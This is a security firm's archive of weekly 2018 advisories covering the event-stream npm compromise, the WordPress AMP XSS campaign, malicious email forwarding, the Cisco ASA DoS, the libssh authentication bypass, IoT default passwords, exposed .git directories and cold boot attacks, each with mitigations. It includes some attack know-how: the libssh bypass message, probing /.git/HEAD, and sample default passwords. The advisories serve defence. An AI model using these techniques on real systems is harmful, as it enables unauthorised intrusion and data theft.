Additional Resources
[1] Ryan Browne, “Facebook documents seized by UK parliament ahead of a crucial hearing,” CNBC, Nov 27, 2018,
[2] “Six4Three Exec Ordered to Surrender Laptop after Facebook Leak,” Fortune, Dec 1, 2018,
[3] Christopher Boyd, “Leaving Laptops in Hotel Rooms: A Bad Idea,” Malwarebytes Labs, Oct 28, 2015, revised Mar 30, 2016,

InGuardians Events & Resources
We are happy to announce that David Mayer, Senior Security Consultant, will be leading  a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

Justin Searle, our Director of ICS Security is in DC this week, teaching his ICS410: ICS/SCADA Security Essentials at SANS Cyber Defense Initiative 

Our CTO, Jay Beale, delivered a talk & demos last week on Kubernetes Attack and Defense. You can find the slides, including Youtube links to all demonstration videos and CTF walkthrough at:

12/4/2018 Node.js package compromised, Copay targeted
NPM, the package manager for Node.js, was serving the package “event-stream” with malicious code. The malicious code was placed inside the NPM package on Oct. 5th and went unnoticed until Nov 20th. Event-stream is a dependency for other non-malicious packages, but this malware targeted the Copay application. The malicious code checked the balances of wallets, and if the balance criteria was met, it harvested the account data, and exfiltrated the data/private keys. 

Impact of this attack is limited to the Copay application, however it highlights the problems inherent trusting dependencies and specifically open source dependencies. This attack was downloaded almost 8 million times, but because it targeted a single application the the impact of the malicious code was limited.

InGuardians recommends that organizations identify if they are utilizing event-stream inside any Node.js applications, specifically version 3.3.6. If the affected version is found, InGuardians recommends reverting to version 3.3.4.

Additional Resources
Details about the event-stream incident

InGuardians Events & Resources
This friday: Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSA about after-hours shenanigans.

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18

For more events and future training schedule, please visit

11/27/2018 WordPress AMP Plugin Under Active New Attack, Achieving Remote Code Execution via Stored Cross-Site Scripting
Bad actors have begun to exploit a privilege escalation vulnerability in the WordPress plugin responsible for rendering Accelerated Mobile Pages (AMP) versions of a WordPress site. The vulnerability permits any registered user to plant JavaScript on any WordPress site that uses the AMP plugin. On many WordPress sites, users can register without approval for an account to make comments on posts.  One of these registered users can place JavaScript on the site using the AJAX functions in the AMP plugin. When an administrator later visits a page with that JavaScript, the attacker gains complete control of the WordPress site, including remote code execution.

There are over 100,000 active installations of the WordPress AMP plugin.  An active campaign is targeting these sites, granting remote code execution to its organizers and activating the vulnerable WooCommerce WordPress plugin, complicating matters for site owners that upgrade their AMP plugin but don’t realize that they need to upgrade or deactivate a newly-activated WooCommerce plugin. While it’s not yet known what the bad actors plan to do with all of the WordPress servers they’re compromising, it’s likely that those machines will be monetized, using some combination of ransomware, crypto-mining, and the items in Brian Krebs’ article, “The Scrap Value of a Hacked PC.”

InGuardians recommends that organizations determine if they are hosting WordPress sites, then check those sites for the AMP plugin, as well as the WooCommerce plugin.  Organization staff should check to make sure version of AMP plugin is not vulnerable, by making sure that it’s version is or later.

InGuardians also recommends that organizations configure WordPress’ automatic update feature, to ensure that plugins spend as little time vulnerable as possible.

Whenever possible, InGuardians recommends that site owners use WordPress only to author content on a private site that isn’t publicly reachable, publishing a static version of that content on their public web site.  The WordPress plugin “Simply Static” can automate this process.

Finally, InGuardians recommends that organizations review the WordPress Hardening Guide, cited in the Additional Resources below.

Additional Resources
“XSS Injection Campaign Exploits WordPress AMP Plugin” (Wordfence Blog)

“Active XSS Attacks Targeting Amp for WP WordPress Plugin” (BleepingComputer)

“Simply Static [Wordpress plugin]” (Code of Conduct, LLC)

“Wordpress Hardening Guide” (

“The Scrap Value of a Hacked PC” (Krebs on Security)

InGuardians Events & Resources
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSA about after-hours shenanigans.

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18

For more events and future training schedule, please visit

11/20/2018 Attackers using email forwarding and deleting to steal information, and can hide their tracks.

A common, yet old, technique attackers use once they’ve gained access to a victim’s email account is to modify the user’s email forwarding settings. These can be forwarded to a temporary email drop-box for remote and untraceable retrieval. Users rarely check their email forwarding settings to see if it has been edited, so the information breach can remain undetected.

A clear sign of such a breach is fewer emails, or none at all, on an account you expect traffic. That lack of email means the forward and delete is being used.
If an attacker has access to your email account, or the entire email management admin account, they may forward a copy of all future emails to another email account and NOT delete them. This scenario you leak all intellectual property, client information, and other sensitive data without an obvious indication to a normal user. We have seen this in the wild, targeting employee payroll and benefits sites, VPN servers, other corporate assets, and such things as University accounts. The attackers can target employees’ accounts on popular online retailers, to more immediately monetize their access. They may also gain long term business intelligence and intellectual property, getting copies of all attachments as well as simple emails. Organizations involved in research or development are prime targets of such redirection attacks.

Check your email account configuration for odd forward or delete-upon-receipt modifications. There are methods for receiving alerts when your email account configuration changes, so use them. Look for forwards to odd domains, such as “nada<dot>email” (that’s a real example). There are others. These names and their associated IP addresses (IPv4 and v6) should be part of your outbound firewall filters. There is no reason your company should be connecting to such places. A Google search for “nada email” will show you that particular solution and many others. Deny organizational traffic to such places and make sure the firewall sends an alert. That your email is trying to go there is proof of unauthorized alteration of email settings, whether from an external attack or an insider.

Additional Resources
“PowerShell and Malicious O365 Email Rules“ (Crypsis Blog)

“Found a forwarding rule in CEO’s account. Need advice.” (Spiceworks User Forum)

“Don’t be a Whale – How To Detect the Business Email Compromise (BEC) Scam” (Tripwire

“When Phishing Succeeds: The Alternate Inbox Method” (Avanan Blog)

GetNada – an example of a simple external email dropbox

InGuardians Events & Resources
Jarrod Frates, InGuardians Senior Security Analyst returns to Brakeing Down Security podcast to continue his discussion about all things pentest. If your organization is engaging in a pentest, give this a listen.
Part 1:
Part 2:

Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSA about after-hours shenanigans.

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:
ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18

For more events and future training schedule, please visit

11/14/2018 Tomorrow’s cybersecurity threat


Over the weeks we have discussed breaking news about security flaws and exploits. Those have all been after a breach or attack was discovered. Tomorrow’s exploits will be both evolutionary and revolutionary.
We will continue to see re-use of old concepts like SQL injection, bad error trapping, or flaws in embedded application code. We have seen those all for years, and they remain in the top vulnerabilities in every list. Two weeks ago researchers discovered a way to modify things like Youtube video links embedded in Word documents that enable running malware without triggering a User Access Control window. Just a month ago, Fancy Bear malware was found in the wild capable of “patching” and tampering with firmware in targeted attacks.

InGuardians recommends you take a step back and consider your internal training and job announcement processes. Many organizations aim to hire people who already know Application X, or announce openings for people who know “Y”. ANY particular program in use today WILL be superseded, and new devices are deployed faster than we realize they are on our networks.  Dr. Weber at the Center for Long Term Cybersecurity, UC Berkeley, uses the rapid growth of internet connected locks as an example of how our concepts and policies are not keeping up. “The notion that there’s this thing called “cybersecurity” that’s distinct from this other thing called “security” — that’s an idea that is disappearing,” Weber said.

InGuardians recommends considering security as the broader guiding concept. Too often “cyber” is separate and in an IT department. Experience reveals that company risks often start in Sales or Marketing Departments, or phishing attacks from email. It is common to be able to pivot from a user machine, discovering and then penetrating Domain Controllers.

Re-examine network architecture to avoid risk of simply walking back to controllers and servers. Segmentation is still a useful strategy even in an era of externally web hosted services.

Many companies like to hire experienced cyber security staff, but where do people get experience? Consider both internal training and partnering with academia for the practical skills really needed. There is now and will be for a long time a major shortage of effective security practitioners. Since that suggests difficulty in hiring them, try training your own. As Weber says, it is also important to look at people already skilled in such things as accounting or healthcare. REAL cybersecurity is a multidisciplinary and context sensitive effort.

Additional Resources
The Ten Most Critical Web Application Security Risks

Unpatched MS Word Flaw Could Allow Hackers to Infect Your Computer

Tomorrow’s cyber threats demand a new kind of cybersecurity workforce

Global Cybersecurity Workforce Shortage to Reach 1.8 Million as Threats Loom Larger and Stakes Rise Higher

The Damaging Effects of IP Theft

Fancy Bear LoJax campaign reveals first documented use of UEFI rootkit in the wild

The Center for Long-Term Cybersecurity, UC Berkeley

InGuardians Resources & Events
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members and say hi!

We are happy to announce that David Mayer, Senior Security Consultant, will be leading  a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

11/6/2018 Zero-day Denial of Service flaw in Cisco ASA and FTD appliances

Cisco has issued a security advisory describing a denial of service condition in both its flagship Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD).  The flaw is in the Session Initiation Protocol (SIP) inspection engine of ASA versions 9.4+ and FTD versions 6.0+. An attacker can use this to crash these appliances. These are remotely executed denial of service (DoS) attacks, and instances of use have already been seen in the wild.  The flaw is described in National Vulnerability Database (NVD) under the entry CVE-2018-15454.

InGuardians rates this vulnerability as High impact. As of the end of last week, InGuardians and several other organizations have identified these attacks in the wild.  Cisco ASA and FTD appliances are widely deployed, and there are no patches available at the time of this writing.


InGuardians recommends that all clients running ASA or FTD appliances identify whether the appliances are vulnerable and apply Cisco’s mitigation advice poste haste.  As noted, attacks have been seen in the wild, and have already caused outages at several organizations.

In the first link in our Additional Resources, Cisco has released the following potential mitigations:

-Disabling SIP inspection
-Filtering on sent-by-address of
-Rate limiting SIP traffic
-Blocking offending hosts

In addition, Cisco released information to help identify, through log analysis, whether or not your appliances have been affected by the DoS attacks.  To hunt for active exploitation of this flaw, staff can run the following two commands.

This command will show a large number of incomplete SIP connections:

show conn port 5060

This will show a high CPU utilization:

show processes cpu-usage non-zero sorted

If the appliance has been attacked successfully, it will crash and reload.  This indicator will also show up as an unknown abort of the DATAPATH thread in the output of the following command:

show crashinfo as

Additional Resources

Cisco Adaptive Security Appliance Software and Cisco Firepower Threat Defense Software Denial of Service Vulnerability (Cisco)

Cisco ASA and FTD SIP Inspection denial-of-service vulnerability (CERT)

Cisco zero-day exploited in the wild to crash and reload devices (ZDNET)

InGuardians Resources and Events

On Thursday, the webinar “Kubernetes Hacking and Hardening Episode 2: Bust a Kube” goes live, presented by InGuardians CTO Jay Beale.  Come learn how to hack and defend Kubernetes, containers, and cloud native environments!

Nov 8, 2018 | 10AM PST / 1PM EST

Awesome article about vulnerabilities that often get ignored by many security departments. Tyler Robinson shares his experience and provides you with helpful tips on how to minimize the risk of a cyber attack on non-computer vectors—threats/7-non-computer-hacks-that-should-never-happen/d/d-id/1333194

Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members and say hi!

We are happy to announce that David Mayer, our Senior Security Consultant will hold a mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

10/30/2018 Windows ‘Deletebug’ Zero-Day allows privilege escalation, data destruction.

A proof-of-concept exploit for a Windows zero-day vulnerability has been released that allows an attacker to delete any kind of file on a victim machine, including those containing data vital to the system. The exploit works on fully-patched Windows 10 machines. The vulnerability is in Microsoft’s Data Sharing Service (dssvc.dll). This is a local service that runs as a LocalSystem account with extensive privileges, and enables data to be brokered between applications.

Mitja Kolsek, describing the vulnerability to Threatpost, said, “Even a low-privileged user can make a request to this service for an undocumented function (only Microsoft and possibly a few outsiders know what this function does), and this function checks whether the requesting user has permissions to create a file in a chosen location,”
If a user does not have permission to write the file, it deletes it.

The problem is the service stops impersonating the user and runs the last step with system privileges, giving the user the ability to delete arbitrary files on the system, whether log files or files they might seek to replace. For example, an attacker may escalate privileges more fully if they could delete the dynamically loaded library (DLL) file from a privileged program, if that program would search for its missing DLL file in a directory to which the attacker can write.

However, as the discoverer SandboxEscaper tweeted. “Here’s a low quality bug that is a pain to exploit…” If SandboxEscaper’s opinion is correct, it is unlikely that there will be immediate wide-reaching uses of the vulnerability. This is in part because an attacker already needs system access or needs to chain this with a remote exploit.  With that said, attackers and even automated worm/bot programs chain exploits. InGuardians takes this vulnerability seriously, as does Microsoft, whose Security Response unit notes that the vulnerability is in scope for its Bug Bounty program.

Recognize that this vulnerability is for NEW versions of Windows, Windows 10, Server 2016 and 2019. Checking event logs and network logs for any unauthorized access should already be part of IT security efforts. Add to it looking for “impersonation” events as shown in 0patch’s description.

It is also important to realize that any service running as system may be susceptible to similar flaws or exploits that are as yet unknown. Network access visibility is a critical part of recognizing potential unauthorized intrusions.

Additional Resources
Windows ‘Deletebug’ Zero-Day Allows Privilege Escalation, Destruction

Microsoft Data Sharing Service

Sandbox Escaper’s tweet

Kolsek’s tweet, 0Patch’s co-Founder, confirming the zero-day vulnerability

Tweet from 0Patch, regarding micro-patching the vulnerability

Microsoft Security Response Tweet regarding bug bounty

InGuardians Events and Resources
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung fu on Dec 7 at 2PM. We will be hanging out after the conference as well, come say hi!

We are happy to announce that David Mayer, our Senior Security Consultant will hold a mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

10/22/2018 Libssh authentication bypass leaves devices vulnerable to unauthenticated shell access.
A critical authentication bypass bug in libssh versions after 0.6 has been identified. Libssh is a library implementation of the SSH version 2 protocol for the C programing language, able run on multiple platforms as both a server and a client. The actual vulnerability itself is exploited  by sending a SSH2_MSG_USERAUTH_SUCCESS message to the server, which in turn presents a shell to the unauthenticated user, giving them access to the end point. The code for the exploit is a mere 27 lines of code and is currently publicly available. Fortunately, fingerprints for the affected services are also publicly available to allow organizations to scan for exploitable end points. So far, the biggest vendor to publicly disclose that they are affected by this issue is F5 networks, with their BIG-IP Advanced Firewall Manager (AFM) product, versions 12 or newer, vulnerable to the exploit.

While the full impact of this issue is still being analyzed, the majority of publicly discovered vulnerable devices, outside of the F5 Big-IP AFM, are SFTP servers, routers, printers, modems, and Internet of Things (IoT) devices. While the libssh library is not the most popular choice for implementing SSHv2, it is used in a wide variety of devices that could be embedded in any network. Libssh is a relatively new library and as such only devices purchased or updated after 2014 are likely to be affected.

InGuardians recommends that organizations scan their networks for vulnerable libssh versions and either manually update libssh or, if that is not possible, restrict access to the affected interfaces and work with their software/device vendors to resolve the issue. The additional recommendations below include a Python program to scan networks for this vulnerability.

Note that this serious vulnerability was created in an apparent attempt to update a code library. Remember: as code ages, updates to patch make sense, but things are NOT always better merely because they are newer. Test and evaluate BEFORE deploying new code.

Additional Resources
F5 Vulnerability Advisory “K52868493: libssh vulnerability CVE-2018-10933” (F5)
“CVE-2018-10933 – libssh’s server-side state machine“ (F5 Customer Post)

“CVE-2018-10933 Detail” (NIST)

CVE-2018-10933 Vulnerability Scanner (Leap Security)

Proof of Concept Exploit (GitHub user kn6869610)

InGuardians Events and Resources

If you are at Wild West Hacking Fest this Friday, watch InGuardians’ Suzanne Pereira and Larry Pesce’s talk, “What to Expect When You are Expecting … A Penetration Test”

10/17/2018 California Bill SB-327 Highlights IoT’s Weak Password Security Practices

The “Internet of Things” (IoT) has massively increased the number of Internet-connected devices which can be hacked by anyone with access to those devices’ well-known passwords. The state of California, with the fifth largest economy in the world, has passed a law that will require all devices in the state to either have unique initial passwords or to have a feature allowing owners to set up a method of authentication before first connecting to the device. This law takes effect on the first day of 2020.


By 2020, makers of Internet-connected devices will be banned from selling devices that have per-product initial passwords. While the presence of default or trivial (eg, “admin/admin”) credentials might seem almost laughable in the year 2018, unfortunately that is not the case.  The Mirai botnet used both default and trivial credentials to compromise more than 600,000 IoT devices in 2016. Using these devices, it sent some of the largest recorded distributed denial of service (DDoS) attacks, in excess of 1.1 terabits per second. The Graham Cluley article referenced below lists the 60 hard coded passwords, including common manufacturer-set initial passwords, like “admin,” “00000000,” and “Zte521.” This problem isn’t confined to IoT devices, either.  Last month, Cisco corrected its use of a static root password for all deployed Cisco Video Surveillance Manager devices in two of the last three released.


InGuardians recommends that every organization check its own devices for trivially weak authentication, whether that entails static, simple, shared passwords (e.g., found in device manuals) or a lack of authentication. While not guaranteed to be comprehensive, a vulnerability scanner like Tenable’s Nessus, Bomgar’s Retina, or the open source OpenVAS, can be particularly helpful, as these tools check for a number of default credentials.

InGuardians recommends that product vendors take the following additional steps to avoid this type of problem:

  • Conduct internal or third party security product reviews to discover these issues well before the first release of a product, as well as before any major update to a product.
  • Review existing manuals and product penetration testing results to determine if password security practices meet best practice and California Bill SB-327.
  • Share California Bill SB-327 with in-house counsel and compliance officers.

InGuardians recommends that product customers take the following additional steps to avoid this type of problem:

  • Conduct regular vulnerability scanning as a component of a process-oriented security program
  • Build and maintain an inventory of all network-connected devices, including IoT and BYOD.
  • Confirm that all administrative passwords for all devices are unique, strong, differ from vendor defaults, and are maintained in a separate, secure password management system.
  • Place IoT and BYOD devices on separate network/VLAN’s, monitored and segmented from each other, from the internal network, and from wide-ranging Internet access.

Additional Resources

California Senate Bill SB-327 (California Legislature)

Cisco Video Surveillance Manager Appliance Default Password Vulnerability (Cisco Security)

These 60 dumb passwords can hijack over 500,000 IoT devices into the Mirai botnet (Graham Cluley)

InGuardians Resources and Events

Online this Thursday, you can learn from InGuardians CTO Jay Beale, as he demonstrates attack and defense on a Linux Capture-the-Flag machine.

If you are at Wild West Hacking Fest next Friday, watch out for InGuardians’ Suzanne Pereira and Larry Pesce’s talk, “What to Expect When You are Expecting … A Penetration Test”

10/11/2018 Web App Penetration Testing without Threat Hunting May Leave Indicators of Compromise Undetected

Many web applications that are available from the Internet handle very sensitive information governed under various compliance initiatives such as HIPAA, PCI, GDPR, etc.  Understanding how that information is protected within the application is just as important as understanding the attack surface of the application.  If a threat actor has gained unauthorized access to a web application and its associated data via a particular vector of vulnerability, they will correct the vulnerability immediately, to keep other threat actors out.  Even automated threat actors historically perform this action.  For example, in April of 2017, the Adylkuzz malware used the same ETERNALBLUE exploit that WannaCry would use a month later in May.  WannaCry was unable to infect the quarter million Adylkuzz victims, because Adylkuzz hardened the systems it compromised (by deactivating SMB).   Because attackers so often remove the vulnerabilities they used to compromise systems and networks, a penetration test alone may not demonstrate the full security posture of a web application and the sensitive data housed within.

In cases where penetration tests are performed without subsequent auditing of the system for embedded threat actors, years may pass before an enterprise learns about a compromise and a threat actor’s presence in its system.  The organization may be violating regulations that govern sensitive data or, even worse, exposing itself to downstream liability issues should the threat actor steal or modify data or conduct fraudulent activity.

Likewise, if proper security controls are not in place to protect the data from a threat actor who has gained access to the application server, then the internal security posture of the application is weak and exposes the organization to risk.

Whenever it is appropriate for a penetration test to be performed on a web application, ensure that two other tasks are also performed.  First, threat hunting on the operating systems in which the application and its data reside, and a development of a clear understanding of data flows, encryption, and other internal controls that should protect the data in the case of a compromise.

Additional Resources
“Getting Ahead of The Adversary – Splunk and Johns Hopkins Demonstrate Threat Hunting Tactics” (Splunk)

“How to Become a Master Threat Hunter” (Carbon Black)

Blue Team Services (InGuardians)

InGuardians Events and Resources
A huge thank you to everyone that came by the booth and caught up with us at Derbycon!   A special shout goes out to Annah W. for winning our Derbycon raffle.

If you are at Wild West Hacking Fest, be sure to catch Suzanne Pereira and Larry Pesce’s presentation “What to expect when you’re expecting… a pentest”.  Two of our directors join forces to discuss how you should prepare and operate during a penetration test.

10/2/2018 Which of your secrets do cloud services see?

Which of your secrets are upload to cloud services, without your explicit instruction? Consider these cases: a Microsoft Word document about an upcoming merger or executive changeover gets infected with malware, triggering its upload to the anti-virus vendor’s cloud service. Or a software crash on a laptop causes an upload of logs and memory dumps, which contain encryption keys, passwords, and confidential files. Or an anti-virus triggers on a ZIP file, uploading the company’s most sensitive financial data to a service. It’s nearly impossible to affirmatively control this data once uploaded. While cloud-based services can bring enormous benefit in cutting off attacks before many ever see them, they rely mostly on automated guesses about files that may grab sensitive information.

Modern security products often look far different from their predecessors from a mere decade ago. In addition to basic functions of blocking unwanted network traffic, anti-virus programs, web proxies, firewalls, VPNs, and even operating systems send various information to cloud-based services. The products’ vendors do this to collect intelligence about malicious activity, crashes, and use patterns to help them understand and react to their customers’ environments.

Security vendors monitor the provided data in real time, reducing many of their customers’ reaction time to potential threats from days to minutes, often automating most of the process. The data have done much to limit opportunities for attackers to obtain unauthorized access or to damage networks after first detection.

However, it’s very easy for proprietary data to get caught up in this. In 2014, software from Kaspersky Labs uploaded suspicious files from a home computer in Maryland. These turned out to be highly classified tools from the National Security Agency’s Tailored Access Operations group, copied by an employee from his work computer to his personal computer. Once the NSA’s tools were compromised, there was no way of reversing this, and the NSA had to halt usage of those tools, likely at significant cost.

The same holds true for anyone using cloud-tied security services. Content from the sites you visit, the files you open, and the software you run may all find its way to a cloud-based vendor. Most will ignore the irrelevant details, but some may parse contents, and some may even sell aggregate or detailed information.

Of course, this problem isn’t confined to security software. Other vendors have used crash data to identify common faults and help developers fix crashes. Photos are automatically uploaded to Apple’s iCloud or Google Photos. Google Sync may automatically back up documents, and cloud storage providers like Box, Dropbox, and Microsoft OneDrive can be configured similarly. Note that any of these services might be configured to use a personal account, rather than one controlled by your organization.

The vast majority of cloud-based security companies take security very seriously and only a tiny fraction of uploaded files are held for very long. Even fewer receive close scrutiny. However, the need to manually
review some submissions means that there is always someone who can see them in their raw state. At that point, the uploading entity has essentially lost all control of the uploaded data. The data is subject to subpoena or warrants, misuse such as insider trading, or theft or leaking by malicious actors.

Avoiding this is possible, but not always easy. The most sensitive files might be managed on “air-gapped” systems (i.e., never connected to a network). Working with air-gapped systems limits productivity, but, when properly done, also creates some of the most secure conditions possible.

InGuardians recommends that companies determine which software running on their systems uploads data to cloud services, what data could be uploaded, and how that data is handled once in the vendor’s hands. Companies can start by investigating Terms of Service, End User License Agreements, and applicable laws and regulations. The next step involves using or establishing vendor security questionnaires, whether custom or from one of the three most popular standards: VSAQ, CAIQ, and SIG/SIG-Lite.

Even strong promises should be approached with caution. Appropriate safeguards for the most sensitive data should be in place using a combination of policy and technology to reduce the risk of inadvertent loss of control. This not only limits the ability of cloud services to gain unexpected access, but also limits dissemination among internal personnel who do not have a need to know.

Additional Resources
Vendor Security Assessment Questionnaire (Google)

Consensus Assessments Working Group (Cloud Security Alliance)

Standardized Information Gathering Questionnaire (SFG Shared Assessments)

Kaspersky: Yes, we obtained NSA secrets. No, we didn’t help steal them (Nov 16, 2017)

Dropbox takes a peek at files. But it’s totally nothing, says Dropbox. (Sep 13, 2013)

How artificial intelligence stopped an Emotet outbreak (Feb 14, 2018)

InGuardians Resources and Events
Derbycon: If you are at Derbycon this week, stop by InGuardians booth.  Many of our operators will be there demonstrating tools, as well as teaching skills ranging from lock picking to RFID hacking.
09/17/2018 A new Cold Boot attack puts data on full-disk encrypted computers at risk again

Revisiting the Cold Boot attack, researchers from F-Secure were able to circumvent current protections, gaining access to data on computers even when Full Disk Encryption (FDE) was enabled.

In the original Cold Boot attack, a bad actor boots the computer from a powered-off state. Booting the target system from removable media (such as a USB thumb drive), the attacker uses memory harvesting tools to recover the contents of RAM from the previous boot.  Most importantly, the attacker gains the decryption keys for the computer’s encrypted drive.

After the publication of the original Cold Boot attack methodology, hardware manufacturers instituted methods for protecting the RAM storing the full disk encryption (FDE) keys.  In the most common protection method, specified by the Trusted Computing Group, the computer overwrites the RAM storing those keys at the time of boot.  Unfortunately, this overwrite only occurs when the Memory Overwrite Request (MOR) bit is set in non-volatile memory.

F-Secure’s researchers found that they were able to modify the BIOS system configuration to flip the MOR bit back to zero, disabling the boot-time FDE key RAM overwrites, allowing themselves to use the original Cold Boot attacks to access the full disk encryption keys, and thus the computer’s drive contents.

With a successful re-implementation of the Cold Boot attack using the updated methodology, it is possible for an attacker to gain access to all of the data stored on a computer, even when FDE is enabled. Should the system contain sensitive information, the attacker can gain full access to the data. The attacker also gains the ability to compromise the computer.

There are some hurdles to overcome for an attacker attempting to deliver the updated Cold Boot attack. The attacker must have:

Unrestricted physical access to the computer under attack
Knowledge and experience delivering the first generation Cold Boot attack
Knowledge, experience, and the appropriate hardware tool set to update the system BIOS to disable memory overwrites.

These hurdles are surmountable, yet the additional requirement to disable memory overwrites is currently obscure.

In limited cases, F-Secure’s researchers were unable to execute the updated Cold Boot attack. The researchers identified that the most recent Apple computers were currently unaffected by their research, as those machines carry an Apple T2 chip, which places encryption keys in a “secure enclave.”

In most cases there are some simple opportunities to thwart the updated Cold Boot attack introduced by F-Secure’s researchers.  These opportunities include:

  • Train employees to power off or hibernate, rather than sleep, their computers. Consider using group policy to enforce this behavior across all computers belonging the the organization.
  • Proper physical security of computers: computers in public or semi-public (such as a laptop in a hotel room), should never be left “out in the open” or unattended.  They should remain with the owner or physically secured in a manner that would prevent tampering (such as being placed in a safe, in the case of a hotel room)
  • Improved FDE implementations: Adoption of robust Bitlocker PINs, entered at time of boot to unlock FDE, can significantly thwart Cold Boot attacks.  In the case where the encryption keys are recovered, the user password would still be required to decrypt.

Additional Resources
“Security flaw in ‘nearly all’ modern PCs and Macs exposes encrypted data” (TechCrunch)

“New modification of the old cold boot attack leaves most systems vulnerable” (Ars Technica)

The Chilling Reality of Cold Boot Attacks (F-Secure)

TCG Platform Reset Attack Mitigation Specification (Trusted Computing Group)

InGuardians Resources and Events
The popular, actionable and insightful piece, “12 Things I Learned the Hard Way about Being a Project Manager in Infosec, by InGuardians’ Director of Operations Suzanne Pereira, contains lessons and reminders on how to manage projects, by focusing on people, communication and advocacy. Read more:

Get some serious RF/Wireless kung fu training from InGuardians Director of Research Larry Pesce at SANS in Las Vegas, Sept 23 – 28, 2018.

Dive deep into ICS Security with hands-on training from Justin Searle, our Director of ICS Security at SANS Las Vegas, Sept 23 – 27, 2018.

09/10/2018 Over 400k websites expose sensitive data via .git/ directory
Speed + Complexity => Errors => Vulnerability.  Your system is probably exposed.
Every week we try to focus on a relevant vulnerability to describe the issue in terms of client exposure. We point to information resources and mitigation strategies to improve security posture and vulnerability detection. This week, InGuardians’ editorial team had too many from which to choose. Here are but a few of the week’s disclosures:
–  NotPetya would have destroyed Maersk’s system if not for ONE server that had been offline due to a power outage.
–  IoT malware infecting aircraft SATCOM systems
–  Schneider controller vulnerability
–  British Airways data breach
–  mSpy’s second data breach
–  400,000 websites expose sensitive system development data via .git/ directories.
The real question then is, if you presume you are exposed, how do you detect and mitigate the risks?
In this weeks newsletter, we focus the .git/ directory exposure in particular.

Open .git directories can contain a great deal of sensitive information, including the web application’s structure, database passwords, API keys, development IDE settings, and more. Czech researcher Vladimir Smitka discovered over 390,000 websites, the majority .COM TLDs, that had internet-readable development directories.

The cause is in part an error in the queries many developers use to confirm that /.git is hidden. Querying a web server for /.git produces an HTTP 403 Error, which is a false negative. This error indicates that no index file exists in the directory (index.html, index.php, …) and that the directory is not auto-indexed. Smitka demonstrated that by querying for the /.git/HEAD file, he could determine that many web applications contained internet-readable .git/ directory contents.

Checking for visibility of a directory is good, provided it’s a valid check.  For the specific case of verifying directories, consider the ways to frame the query and what happens when URL and other queries fail; what is the error trap and error message? Are THOSE valid?

Developers and other staff are under pressure to create and deploy systems quickly – that’s not going to change. However the process must provide for thorough systems review and policy guidance to catch potential for failure early. In today’s multiple-releases-per-day DevOps modality, this will likely involve automating good checks as part of the build process.

These themes ran through the breaches and vulnerabilities discovered this week. Consider mSpy, a popular spyware tool for monitoring kids and others. Let’s take a leap of faith and say it’s used for GOOD THINGS, like ensuring the kids are home after school. The hacked database required no authentication. It revealed large amounts of broad categories of data, including Apple iCloud usernames and authentication tokens, Facebook posts, emails, credit card transactions, and more. So, the information from the mSpy breach could include the information necessary to access a company network.  Our mobile devices collect more than we may realize.

The general lesson is that a website error can lead to information leaks for internal disruption and for external leaks. The plethora of choices this week were not (necessarily) related, but EVERY week there is something. Every organization must continuously examine the security architecture to mitigate single points of failure and to prevent resident info on one victimized system from providing the keys for a successful pivot to domain controllers or the organization’s key networks. Mobile devices mean internal networks have more external connections than their architects may realize. It’s important to remember gadgets, BYOD mobile devices, and apps like mSpy when considering information technology’s footprint.

Additional Resources
“400,000 Websites Vulnerable through Exposed .git Directories” (SC Magazine)

“Open git Global Scan” (Vladimir Smitka)

NotPetya analysis (Wired)

IoT Malware and SATCOM (Helpnet Security)

Schneider Electric Controller Vulnerability (Security Week)

British Airways Data Breach (CNN Money)

mSpy Mobile Spyware data breach (Krebs on Security)

InGuardians Resources and Events

The popular, actionable and insightful piece, “12 Things I Learned the Hard Way about Being a Project Manager in Infosec, by InGuardians’ Director of Operations Suzanne Pereira, contains lessons and reminders on how to manage projects, by focusing on people, communication and advocacy. Read more:


